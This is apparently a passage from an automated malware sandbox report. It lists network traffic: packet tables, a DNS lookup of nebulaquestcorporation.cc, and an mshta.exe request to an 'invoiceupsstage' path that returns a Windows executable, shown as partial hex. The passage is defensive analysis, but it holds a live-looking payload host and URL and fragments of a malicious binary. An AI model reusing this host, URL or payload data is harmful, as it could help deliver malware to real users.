                    Jul 2, 2024 12:47:28.546966076 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.546977997 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.547007084 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.547724962 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.547751904 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.547786951 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.547796965 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.547825098 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.554965019 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.555037022 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.575498104 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.575531960 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.575618982 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.575647116 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.602018118 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.602061033 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.602233887 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.602233887 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.602257013 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.630140066 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.630173922 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.630255938 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.630285025 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.630306959 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.630462885 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.630491972 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.630523920 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.630541086 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.630553961 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.630857944 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.630880117 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.630912066 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.630923033 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.630935907 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.631575108 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.631606102 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.631650925 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.631663084 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.631675959 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.632435083 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.632460117 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.632534981 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.632548094 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.632556915 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.633332014 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.633363008 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.633398056 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.633407116 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.633429050 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.664717913 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.664751053 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.664973974 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.664994955 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.689024925 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.689062119 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.689105988 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.689136028 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.689150095 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.718940020 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.718971014 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.719039917 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.719065905 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.719089985 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.719290972 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.719316006 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.719341040 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.719351053 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.719379902 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.719773054 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.719791889 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.719841003 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.719852924 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.719873905 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.720793009 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.720820904 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.720861912 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.720874071 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.720910072 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.721463919 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.721483946 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.721550941 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.721564054 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.721576929 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.722300053 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.722325087 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.722378969 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.722387075 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.722420931 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.754349947 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.754381895 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.754417896 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.754435062 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.754468918 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.779341936 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.779381037 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.779424906 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.779445887 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.779479027 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.807838917 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.807873011 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.807909966 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.807938099 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.807985067 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.808218002 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.808242083 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.808276892 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.808288097 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.808300972 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.808954000 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.808983088 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.809026957 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.809036016 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.809048891 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.809847116 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.809870005 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.809906960 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.809915066 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.809931993 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.810544968 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.810563087 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.810595036 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.810605049 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.810628891 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.811007977 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.811032057 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.811067104 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.811077118 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.811094046 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.847202063 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.847223997 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.847269058 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.847285032 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.847316980 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.868021011 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.868051052 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.868113041 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.868124008 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.868299961 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.868350983 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.868419886 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.868427038 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.868447065 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.868465900 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.868494034 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.868796110 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:40.173551083 CEST49723443192.168.2.8104.77.220.172
                    Jul 2, 2024 12:47:40.173572063 CEST44349723104.77.220.172192.168.2.8
                    Jul 2, 2024 12:47:40.173753023 CEST49723443192.168.2.8104.77.220.172
                    Jul 2, 2024 12:47:40.176141977 CEST49723443192.168.2.8104.77.220.172
                    Jul 2, 2024 12:47:40.176156998 CEST44349723104.77.220.172192.168.2.8
                    Jul 2, 2024 12:47:40.762943029 CEST44349723104.77.220.172192.168.2.8
                    Jul 2, 2024 12:47:40.763221979 CEST49723443192.168.2.8104.77.220.172
                    Jul 2, 2024 12:47:40.763252020 CEST44349723104.77.220.172192.168.2.8
                    Jul 2, 2024 12:47:40.764336109 CEST44349723104.77.220.172192.168.2.8
                    Jul 2, 2024 12:47:40.764394045 CEST49723443192.168.2.8104.77.220.172
                    Jul 2, 2024 12:47:40.792608976 CEST49723443192.168.2.8104.77.220.172
                    Jul 2, 2024 12:47:40.792799950 CEST44349723104.77.220.172192.168.2.8
                    Jul 2, 2024 12:47:40.792843103 CEST49723443192.168.2.8104.77.220.172
                    Jul 2, 2024 12:47:40.840503931 CEST44349723104.77.220.172192.168.2.8
                    Jul 2, 2024 12:47:40.879062891 CEST49723443192.168.2.8104.77.220.172
                    Jul 2, 2024 12:47:40.879092932 CEST44349723104.77.220.172192.168.2.8
                    Jul 2, 2024 12:47:40.925857067 CEST44349723104.77.220.172192.168.2.8
                    Jul 2, 2024 12:47:40.925959110 CEST49723443192.168.2.8104.77.220.172
                    Jul 2, 2024 12:47:40.927369118 CEST49723443192.168.2.8104.77.220.172
                    Jul 2, 2024 12:47:40.927392006 CEST44349723104.77.220.172192.168.2.8

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jul 2, 2024 12:47:20.080583096 CEST5919353192.168.2.81.1.1.1
                    Jul 2, 2024 12:47:20.429162025 CEST53591931.1.1.1192.168.2.8

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jul 2, 2024 12:47:20.080583096 CEST192.168.2.81.1.1.10x3865Standard query (0)nebulaquestcorporation.ccA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jul 2, 2024 12:47:20.429162025 CEST1.1.1.1192.168.2.80x3865No error (0)nebulaquestcorporation.cc5.188.88.146A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • nebulaquestcorporation.cc
                    • armmf.adobe.com

                    HTTPS Proxied Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.8497055.188.88.1464434996C:\Windows\System32\mshta.exe
                    TimestampBytes transferredDirectionData
                    2024-07-02 10:47:21 UTC351OUTGET /cdnusa/invoiceupsstage HTTP/1.1
                    Accept: */*
                    Accept-Language: en-CH
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: nebulaquestcorporation.cc
                    Connection: Keep-Alive
                    2024-07-02 10:47:22 UTC211INHTTP/1.1 200 OK
                    Server: nginx
                    Date: Tue, 02 Jul 2024 10:47:21 GMT
                    Content-Length: 200872
                    Connection: close
                    Last-Modified: Wed, 12 Jun 2024 12:19:07 GMT
                    ETag: "310a8-61ab0638cc4c0"
                    Accept-Ranges: bytes
                    2024-07-02 10:47:22 UTC16173INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b5 92 a2 1d f1 f3 cc 4e f1 f3 cc 4e f1 f3 cc 4e e5 98 c9 4f f0 f3 cc 4e e5 98 cf 4f f3 f3 cc 4e e5 98 c8 4f e5 f3 cc 4e e5 98 cd 4f f8 f3 cc 4e f1 f3 cd 4e c4 f3 cc 4e e5 98 c5 4f f2 f3 cc 4e e5 98 33 4e f0 f3 cc 4e e5 98 ce 4f f0 f3 cc 4e 52 69 63 68 f1 f3 cc 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 4a 8a 5c 2d 00 00 00 00 00 00 00 00 e0 00 02
                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NNNONONONONNNON3NNONRichNPELJ\-
                    2024-07-02 10:47:22 UTC16384INData Raw: 07 08 0c 0c 0c 16 00 00 00 00 00 00 00 00 00 39 0c 0c 0c 07 4b ff ff 62 15 5f ff 5c 22 65 ff ff 49 08 0c 0c 0c 20 00 00 00 00 00 00 00 00 00 4b 0c 0c 08 4b ff ff 67 22 04 5f ff 5c 04 39 ff ff 6f 28 0c 0c 0c 2f 00 00 00 00 00 00 00 00 00 00 0c 0c 0c 45 ff 62 18 07 07 5f ff 5c 18 63 ff ff 57 0c 0c 0c 0c 43 00 00 00 00 00 00 00 00 00 00 0c 0c 0c 07 3c 22 07 08 07 5f ff 5c 60 ff ff 54 07 0c 0c 0c 0c 00 00 00 00 00 00 00 00 00 00 00 3d 0c 0c 0c 0c 0c 0c 08 08 5f ff ff ff ff 54 07 07 0c 0c 0c 28 00 00 00 00 00 00 00 00 00 00 00 00 0c 0c 0c 0c 0c 0c 0c 0c 5f ff ff ff 54 04 08 0c 0c 0c 0c 51 00 00 00 00 00 00 00 00 00 00 00 00 54 0c 0c 0c 0c 0c 0c 0c 5f ff ff 4b 07 08 0c 0c 0c 0c 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 0c 0c 0c 0c 0c 0c 5f 74 54 07 07 0c
                    Data Ascii: 9Kb_\"eI KKg"_\9o(/Eb_\cWC<"_\`T=_T(_TQT_KAI_tT
                    2024-07-02 10:47:22 UTC16384INData Raw: 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 64 32 07 ff c4 b1 a1 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fb f9 f8 ff a0 81 67 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 5b 2a 00 f1 00 00 00 59 00 00 00 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5f 2c 00 e7 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff be a8 96 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                    Data Ascii: ,`,`,`,`,`,`,`,d2g`,`,`,`,`,`,`,`,`,`,`,`,[*Y_,`,`,`,`,`,`,`,`,`,`,`,
                    2024-07-02 10:47:22 UTC16384INData Raw: 20 74 79 70 65 3d 22 77 69 6e 33 32 22 2f 3e 0d 0a 0d 0a 20 20 3c 64 65 73 63 72 69 70 74 69 6f 6e 3e 42 6c 75 65 74 6f 6f 74 68 20 55 6e 69 6e 73 74 61 6c 6c 20 44 65 76 69 63 65 20 54 61 73 6b 3c 2f 64 65 73 63 72 69 70 74 69 6f 6e 3e 0d 0a 0d 0a 20 20 3c 21 2d 2d 20 49 64 65 6e 74 69 66 79 20 74 68 65 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2e 20 2d 2d 3e 0d 0a 0d 0a 20 20 3c 74 72 75 73 74 49 6e 66 6f 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 33 22 3e 0d 0a 20 20 20 20 3c 73 65 63 75 72 69 74 79 3e 0d 0a 20 20 20 20 20 20 3c 72 65 71 75 65 73 74 65 64 50 72 69 76 69 6c 65 67 65 73 3e 0d 0a 20 20 20 20 20 20 20 20 3c
                    Data Ascii: type="win32"/> <description>Bluetooth Uninstall Device Task</description> ... Identify the application security requirements. --> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <
                    2024-07-02 10:47:22 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5d 2b 00 1e 5e 2b 00 91 60 2c 00 fd 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff c5 b1 a1 ff a2 85 6b ff 57 20 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 fe 52 26 00 a5 38 1a 00 32 00 00 00 06 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 2b 00 60 5e 2b 00 bd 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 5e 29 00 ff 5f 2a 00 ff 60 2c 00 ff 60 2c 00 ff 60 2c 00 ff 59 29 00 c7 51 25 00 70 00 00 00 0d 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Data Ascii: ]+^+`,`,`,`,`,kW `,`,`,`,`,R&82^+`^+`,`,`,`,^)_*`,`,`,Y)Q%p
                    2024-07-02 10:47:22 UTC16384INData Raw: 4e 2c 71 65 2c 47 49 2c 47 49 2c 63 57 2c 71 65 2c 57 57 2c 45 47 2c 45 47 2c 57 57 2c 71 65 2c 47 49 2c 47 49 2c 4d 54 2c 71 65 2c 47 49 2c 47 49 2c 47 49 2c 71 65 2c 47 49 2c 47 49 2c 56 4c 2c 71 65 2c 57 57 2c 45 47 2c 45 47 2c 45 47 2c 71 65 2c 57 57 2c 45 47 2c 57 57 2c 7a 70 2c 71 65 2c 57 57 2c 45 47 2c 57 57 2c 6e 46 2c 71 65 2c 57 57 2c 45 47 2c 57 57 2c 7a 70 2c 71 65 2c 57 57 2c 45 47 2c 57 57 2c 52 4e 2c 71 65 2c 47 49 2c 47 49 2c 4d 54 2c 71 65 2c 57 57 2c 45 47 2c 57 57 2c 57 57 2c 71 65 2c 57 57 2c 45 47 2c 57 57 2c 57 57 2c 71 65 2c 57 57 2c 45 47 2c 45 47 2c 45 47 2c 71 65 2c 57 57 2c 45 47 2c 45 47 2c 45 47 2c 71 65 2c 57 57 2c 45 47 2c 57 57 2c 57 57 2c 71 65 2c 57 57 2c 45 47 2c 45 47 2c 6e 46 2c 71 65 2c 47 49 2c 47 49 2c 4d 54 2c 71
                    Data Ascii: N,qe,GI,GI,cW,qe,WW,EG,EG,WW,qe,GI,GI,MT,qe,GI,GI,GI,qe,GI,GI,VL,qe,WW,EG,EG,EG,qe,WW,EG,WW,zp,qe,WW,EG,WW,nF,qe,WW,EG,WW,zp,qe,WW,EG,WW,RN,qe,GI,GI,MT,qe,WW,EG,WW,WW,qe,WW,EG,WW,WW,qe,WW,EG,EG,EG,qe,WW,EG,EG,EG,qe,WW,EG,WW,WW,qe,WW,EG,EG,nF,qe,GI,GI,MT,q
                    2024-07-02 10:47:22 UTC16384INData Raw: 2c 45 47 2c 45 47 2c 57 57 2c 71 65 2c 57 57 2c 45 47 2c 57 57 2c 7a 70 2c 71 65 2c 47 49 2c 47 49 2c 47 49 2c 71 65 2c 57 57 2c 45 47 2c 57 57 2c 4d 54 2c 71 65 2c 57 57 2c 45 47 2c 45 47 2c 45 47 2c 71 65 2c 57 57 2c 45 47 2c 57 57 2c 7a 70 2c 71 65 2c 57 57 2c 45 47 2c 57 57 2c 7a 70 2c 71 65 2c 57 57 2c 45 47 2c 57 57 2c 56 4c 2c 71 65 2c 47 49 2c 47 49 2c 4d 54 2c 71 65 2c 57 57 2c 45 47 2c 57 57 2c 4d 54 2c 71 65 2c 47 49 2c 47 49 2c 4d 54 2c 71 65 2c 57 57 2c 45 47 2c 57 57 2c 57 57 2c 71 65 2c 47 49 2c 47 49 2c 4d 54 2c 71 65 2c 57 57 2c 45 47 2c 45 47 2c 6e 46 2c 71 65 2c 57 57 2c 45 47 2c 45 47 2c 45 47 2c 71 65 2c 47 49 2c 47 49 2c 65 48 2c 71 65 2c 57 57 2c 45 47 2c 45 47 2c 45 47 2c 71 65 2c 47 49 2c 47 49 2c 4d 54 2c 71 65 2c 57 57 2c 45 47
                    Data Ascii: ,EG,EG,WW,qe,WW,EG,WW,zp,qe,GI,GI,GI,qe,WW,EG,WW,MT,qe,WW,EG,EG,EG,qe,WW,EG,WW,zp,qe,WW,EG,WW,zp,qe,WW,EG,WW,VL,qe,GI,GI,MT,qe,WW,EG,WW,MT,qe,GI,GI,MT,qe,WW,EG,WW,WW,qe,GI,GI,MT,qe,WW,EG,EG,nF,qe,WW,EG,EG,EG,qe,GI,GI,eH,qe,WW,EG,EG,EG,qe,GI,GI,MT,qe,WW,EG
                    2024-07-02 10:47:22 UTC16384INData Raw: 63 57 2c 71 65 2c 47 49 2c 47 49 2c 52 4e 2c 71 65 2c 57 57 2c 45 47 2c 45 47 2c 6e 46 2c 71 65 2c 47 49 2c 47 49 2c 52 4e 2c 71 65 2c 57 57 2c 45 47 2c 57 57 2c 6e 46 2c 71 65 2c 57 57 2c 45 47 2c 57 57 2c 4d 54 2c 71 65 2c 57 57 2c 45 47 2c 57 57 2c 7a 70 2c 71 65 2c 57 57 2c 45 47 2c 45 47 2c 7a 70 2c 71 65 2c 57 57 2c 45 47 2c 45 47 2c 45 47 2c 71 65 2c 57 57 2c 45 47 2c 45 47 2c 6e 46 2c 71 65 2c 47 49 2c 47 49 2c 56 4c 2c 71 65 2c 57 57 2c 45 47 2c 45 47 2c 7a 70 2c 71 65 2c 47 49 2c 47 49 2c 56 4c 2c 71 65 2c 57 57 2c 45 47 2c 45 47 2c 7a 70 2c 71 65 2c 57 57 2c 45 47 2c 45 47 2c 7a 70 2c 71 65 2c 57 57 2c 45 47 2c 57 57 2c 56 4c 2c 71 65 2c 47 49 2c 47 49 2c 63 57 2c 71 65 2c 47 49 2c 47 49 2c 52 4e 2c 71 65 2c 47 49 2c 47 49 2c 65 48 2c 71 65 2c
                    Data Ascii: cW,qe,GI,GI,RN,qe,WW,EG,EG,nF,qe,GI,GI,RN,qe,WW,EG,WW,nF,qe,WW,EG,WW,MT,qe,WW,EG,WW,zp,qe,WW,EG,EG,zp,qe,WW,EG,EG,EG,qe,WW,EG,EG,nF,qe,GI,GI,VL,qe,WW,EG,EG,zp,qe,GI,GI,VL,qe,WW,EG,EG,zp,qe,WW,EG,EG,zp,qe,WW,EG,WW,VL,qe,GI,GI,cW,qe,GI,GI,RN,qe,GI,GI,eH,qe,
                    2024-07-02 10:47:22 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Data Ascii:
